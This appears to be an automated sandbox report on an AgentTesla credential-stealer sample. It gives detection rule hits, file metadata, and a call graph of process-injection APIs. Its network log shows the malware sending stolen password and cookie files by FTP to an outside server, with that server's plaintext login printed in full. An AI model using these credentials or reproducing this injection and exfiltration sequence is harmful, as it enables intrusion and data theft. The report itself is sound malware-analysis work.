                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.848598812124929
                              Encrypted:false
                              SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                              MD5:9664DAA86F8917816B588C715D97BE07
                              SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                              SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                              SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:modified
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.168259436591761
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:wva4mZuUb4.exe
                              File size:834'048 bytes
                              MD5:c6ad6edfa92898ce230177f0ecb4890c
                              SHA1:49b4e85cbf95afab5be60b3272370886418d64e9
                              SHA256:872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463
                              SHA512:3865985334c5ac7a62f8cace759d2dcd13f8217472d9f3205eceaa0a418d1663f0f60826341ad569e4eeff22da86b1af80b49df8d4598e6e7b816c06113d8a6a
                              SSDEEP:12288:etc3yuZG8+De1kIse8LRWjrZCollIoNE8kOZu3OvK541rViCm:etc3yuZGVteKRyjl6ik4COvy41rV
                              TLSH:E005F19903FC9EA0FA7E1BB5C57212044B75B447B872E35C86C090FA5D73BE28992763
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......+................................. ........@.. ....................... ............`................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x4cd12e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x2BA31797 [Sun Mar 14 11:31:35 1993 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xcd0d40x57.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x3bc.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000xcb1340xcb20026eba218b095434232afd6b6300df7a1False0.7669146634615385data7.176062278190911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0xce0000x3bc0x4009d9e143f1fca4a0685d8e5d8afeb5a33False0.4169921875data3.3068409614403143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xd00000xc0x20037ebcbf33e897c6c0e4f8ce039547c90False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0xce0580x364data0.4504608294930876
                              DLLImport
                              mscoree.dll_CorExeMain
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-05T17:29:52.838168+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.749835162.241.203.3021TCP
                              2024-12-05T17:29:53.773083+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.749846162.241.203.3044938TCP
                              2024-12-05T17:29:53.893896+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.749846162.241.203.3044938TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:29:49.300371885 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:49.420286894 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:49.420820951 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:50.572643995 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:50.572849035 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:50.692922115 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:50.908552885 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:50.908767939 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:51.028603077 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:51.362410069 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:51.365047932 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:51.485551119 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:51.718318939 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:51.718554974 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:51.839087963 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.051671982 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.051917076 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:52.173274994 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.385242939 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.385406017 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:52.506860018 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.717539072 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.718235970 CET4984644938192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:52.770834923 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:52.837995052 CET4493849846162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:52.838069916 CET4984644938192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:52.838167906 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:52.958103895 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:53.772799969 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:53.773082972 CET4984644938192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:53.773138046 CET4984644938192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:53.817605019 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:53.893690109 CET4493849846162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:53.893806934 CET4493849846162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:53.893896103 CET4984644938192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:54.109085083 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:54.157854080 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:54.277652979 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:54.489896059 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:54.490277052 CET4985146076192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:54.536339998 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:54.611881018 CET4607649851162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:54.612051010 CET4985146076192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:54.612132072 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:54.731878996 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.572333097 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.572616100 CET4985146076192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:55.572681904 CET4985146076192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:55.615098000 CET4983521192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:55.692434072 CET4607649851162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.692465067 CET4607649851162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.692477942 CET4607649851162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.692980051 CET4607649851162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.693028927 CET4985146076192.168.2.7162.241.203.30
                              Dec 5, 2024 17:29:55.905266047 CET2149835162.241.203.30192.168.2.7
                              Dec 5, 2024 17:29:55.958342075 CET4983521192.168.2.7162.241.203.30
                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:29:48.925097942 CET6051053192.168.2.71.1.1.1
                              Dec 5, 2024 17:29:49.294320107 CET53605101.1.1.1192.168.2.7
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 5, 2024 17:29:48.925097942 CET192.168.2.71.1.1.10xe6afStandard query (0)ftp.aminhacorretora.com.brA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 5, 2024 17:29:49.294320107 CET1.1.1.1192.168.2.70xe6afNo error (0)ftp.aminhacorretora.com.braminhacorretora.com.brCNAME (Canonical name)IN (0x0001)false
                              Dec 5, 2024 17:29:49.294320107 CET1.1.1.1192.168.2.70xe6afNo error (0)aminhacorretora.com.br162.241.203.30A (IP address)IN (0x0001)false
                              TimestampSource PortDest PortSource IPDest IPCommands
                              Dec 5, 2024 17:29:50.572643995 CET2149835162.241.203.30192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server.
                              220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 150 allowed.220-Local time is now 13:29. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                              Dec 5, 2024 17:29:50.572849035 CET4983521192.168.2.7162.241.203.30USER logsftp@aminhacorretora.com.br
                              Dec 5, 2024 17:29:50.908552885 CET2149835162.241.203.30192.168.2.7331 User logsftp@aminhacorretora.com.br OK. Password required
                              Dec 5, 2024 17:29:50.908767939 CET4983521192.168.2.7162.241.203.30PASS _yA=,M5*J?KH
                              Dec 5, 2024 17:29:51.362410069 CET2149835162.241.203.30192.168.2.7230 OK. Current restricted directory is /
                              Dec 5, 2024 17:29:51.718318939 CET2149835162.241.203.30192.168.2.7504 Unknown command
                              Dec 5, 2024 17:29:51.718554974 CET4983521192.168.2.7162.241.203.30PWD
                              Dec 5, 2024 17:29:52.051671982 CET2149835162.241.203.30192.168.2.7257 "/" is your current location
                              Dec 5, 2024 17:29:52.051917076 CET4983521192.168.2.7162.241.203.30TYPE I
                              Dec 5, 2024 17:29:52.385242939 CET2149835162.241.203.30192.168.2.7200 TYPE is now 8-bit binary
                              Dec 5, 2024 17:29:52.385406017 CET4983521192.168.2.7162.241.203.30PASV
                              Dec 5, 2024 17:29:52.717539072 CET2149835162.241.203.30192.168.2.7227 Entering Passive Mode (162,241,203,30,175,138)
                              Dec 5, 2024 17:29:52.838167906 CET4983521192.168.2.7162.241.203.30STOR PW_user-367706_2024_12_05_12_39_23.html
                              Dec 5, 2024 17:29:53.772799969 CET2149835162.241.203.30192.168.2.7150 Accepted data connection
                              Dec 5, 2024 17:29:54.109085083 CET2149835162.241.203.30192.168.2.7226-File successfully transferred
                              226-File successfully transferred226 0.333 seconds (measured here), 0.95 Kbytes per second
                              Dec 5, 2024 17:29:54.157854080 CET4983521192.168.2.7162.241.203.30PASV
                              Dec 5, 2024 17:29:54.489896059 CET2149835162.241.203.30192.168.2.7227 Entering Passive Mode (162,241,203,30,179,252)
                              Dec 5, 2024 17:29:54.612132072 CET4983521192.168.2.7162.241.203.30STOR CO_user-367706_2024_12_05_12_39_28.zip
                              Dec 5, 2024 17:29:55.572333097 CET2149835162.241.203.30192.168.2.7150 Accepted data connection
                              Dec 5, 2024 17:29:55.905266047 CET2149835162.241.203.30192.168.2.7226-File successfully transferred
                              226-File successfully transferred226 0.333 seconds (measured here), 10.06 Kbytes per second

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:11:28:40
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\wva4mZuUb4.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\wva4mZuUb4.exe"
                              Imagebase:0x5b0000
                              File size:834'048 bytes
                              MD5 hash:C6AD6EDFA92898CE230177F0ECB4890C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:10
                              Start time:12:38:49
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xad0000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:20.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:6.1%
                                Total number of Nodes:98
                                Total number of Limit Nodes:8
                                execution_graph 51508 8f06d70 51509 8f06d4a 51508->51509 51509->51508 51510 8f071e1 51509->51510 51513 8f098d0 51509->51513 51517 8f093c8 51509->51517 51515 8f098f7 51513->51515 51514 8f099bb 51514->51509 51515->51514 51521 8f0bc58 51515->51521 51518 8f093d6 51517->51518 51519 8f093dd 51517->51519 51518->51509 51519->51518 51520 8f0bc58 CreateProcessAsUserW 51519->51520 51520->51519 51522 8f0bcd7 CreateProcessAsUserW 51521->51522 51524 8f0bdd8 51522->51524 51525 780ada0 51526 780adb4 51525->51526 51527 780ae2d 51526->51527 51535 8f02e02 51526->51535 51539 8f0377d 51526->51539 51543 8f02c9d 51526->51543 51547 8f035ec 51526->51547 51551 8f02aeb 51526->51551 51555 8f03597 51526->51555 51559 8f04527 51526->51559 51563 8f04a40 51535->51563 51567 8f04a48 51535->51567 51536 8f02e13 51541 8f04a40 VirtualProtect 51539->51541 51542 8f04a48 VirtualProtect 51539->51542 51540 8f03797 51541->51540 51542->51540 51545 8f04a40 VirtualProtect 51543->51545 51546 8f04a48 VirtualProtect 51543->51546 51544 8f02cc1 51545->51544 51546->51544 51549 8f04a40 VirtualProtect 51547->51549 51550 8f04a48 VirtualProtect 51547->51550 51548 8f0362a 51549->51548 51550->51548 51553 8f04a40 VirtualProtect 51551->51553 51554 8f04a48 VirtualProtect 51551->51554 51552 8f02afc 51553->51552 51554->51552 51557 8f04a40 VirtualProtect 51555->51557 51558 8f04a48 VirtualProtect 51555->51558 51556 8f035ab 51557->51556 51558->51556 51561 8f04a40 VirtualProtect 51559->51561 51562 8f04a48 VirtualProtect 51559->51562 51560 8f04538 51561->51560 51562->51560 51564 8f04a44 VirtualProtect 51563->51564 51566 8f04aca 51564->51566 51566->51536 51568 8f04a4b VirtualProtect 51567->51568 51570 8f04aca 51568->51570 51570->51536 51581 8f0f030 51582 8f0f075 Wow64SetThreadContext 51581->51582 51584 8f0f0bd 51582->51584 51614 8f0ed90 51615 8f0edd8 VirtualProtectEx 51614->51615 51617 8f0ee16 51615->51617 51585 8f0f4b8 51586 8f0f643 51585->51586 51588 8f0f4de 51585->51588 51588->51586 51589 8f0e138 51588->51589 51590 8f0f738 PostMessageW 51589->51590 51591 8f0f7a4 51590->51591 51591->51588 51618 8f0f298 51619 8f0f2d8 ResumeThread 51618->51619 51621 8f0f309 51619->51621 51622 8f0d818 51623 8f0d85d Wow64GetThreadContext 51622->51623 51625 8f0d8a5 51623->51625 51571 14ecd60 DuplicateHandle 51572 14ecdf6 51571->51572 51573 8f0e640 51574 8f0e688 WriteProcessMemory 51573->51574 51576 8f0e6df 51574->51576 51626 8f0df00 51627 8f0df40 VirtualAllocEx 51626->51627 51629 8f0df7d 51627->51629 51592 14ecb18 51593 14ecb5e GetCurrentProcess 51592->51593 51595 14ecba9 51593->51595 51596 14ecbb0 GetCurrentThread 51593->51596 51595->51596 51597 14ecbed GetCurrentProcess 51596->51597 51598 14ecbe6 51596->51598 51599 14ecc23 51597->51599 51598->51597 51600 14ecc4b GetCurrentThreadId 51599->51600 51601 14ecc7c 51600->51601 51602 14ea798 51603 14ea7a7 51602->51603 51605 14ea890 51602->51605 51606 14ea8c4 51605->51606 51607 14ea8a1 51605->51607 51606->51603 51607->51606 51608 14eaac8 GetModuleHandleW 51607->51608 51609 14eaaf5 51608->51609 51609->51603 51577 780be38 51578 780be3b VirtualProtect 51577->51578 51580 780beba 51578->51580 51630 f41c88 CloseHandle 51631 f41cef 51630->51631 51610 627c5f8 51611 627c63e DeleteFileW 51610->51611 51613 627c677 51611->51613

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 761 780401e-7804072 762 7804074-7804078 761->762 763 780407b-78040cc 761->763 762->763 766 78040d2-78041cc 763->766 767 78041d4-78041d6 763->767 766->767 768 78041d8-78041db 767->768 769 78041dd-78041ed 767->769 771 780421b-780565a 768->771 773 7804202-7804218 769->773 774 78041ef-7804200 769->774 1032 7805660-78056e8 771->1032 1033 780730b-7807366 771->1033 773->771 774->771 1366 78056ee call 78082a0 1032->1366 1367 78056ee call 78082b0 1032->1367 1039 78073a8-78073ef 1033->1039 1040 7807368-78073a6 1033->1040 1043 78073f0-780741d 1039->1043 1040->1039 1046 780741f-7807454 1043->1046 1048 7807484-7807498 1046->1048 1049 7807456-7807459 1046->1049 1052 78074f5-7807528 1048->1052 1053 780749a-780749e 1048->1053 1050 7807474-7807482 1049->1050 1051 780745b-7807470 1049->1051 1050->1048 1051->1050 1056 78056f1-78058e4 1080 78058ea-78059d9 1056->1080 1081 78059de-7805acc 1056->1081 1102 7805acf-7806f9f 1080->1102 1081->1102 1102->1033 1366->1056 1367->1056
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$G
                                • API String ID: 0-3628805992
                                • Opcode ID: 835dcaddd45e2b627364ed27e8389e819785d3994d8c857fd9ef80b8f6dfa3b2
                                • Instruction ID: 9ce777ba27d6a0f4317a1bea10c337182c942656e6473bbd2636b652db90eef9
                                • Opcode Fuzzy Hash: 835dcaddd45e2b627364ed27e8389e819785d3994d8c857fd9ef80b8f6dfa3b2
                                • Instruction Fuzzy Hash: C2539970A047188FCB58EF79D89939DBFB1AF88300F5044EAD549A3355DE38AD88CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
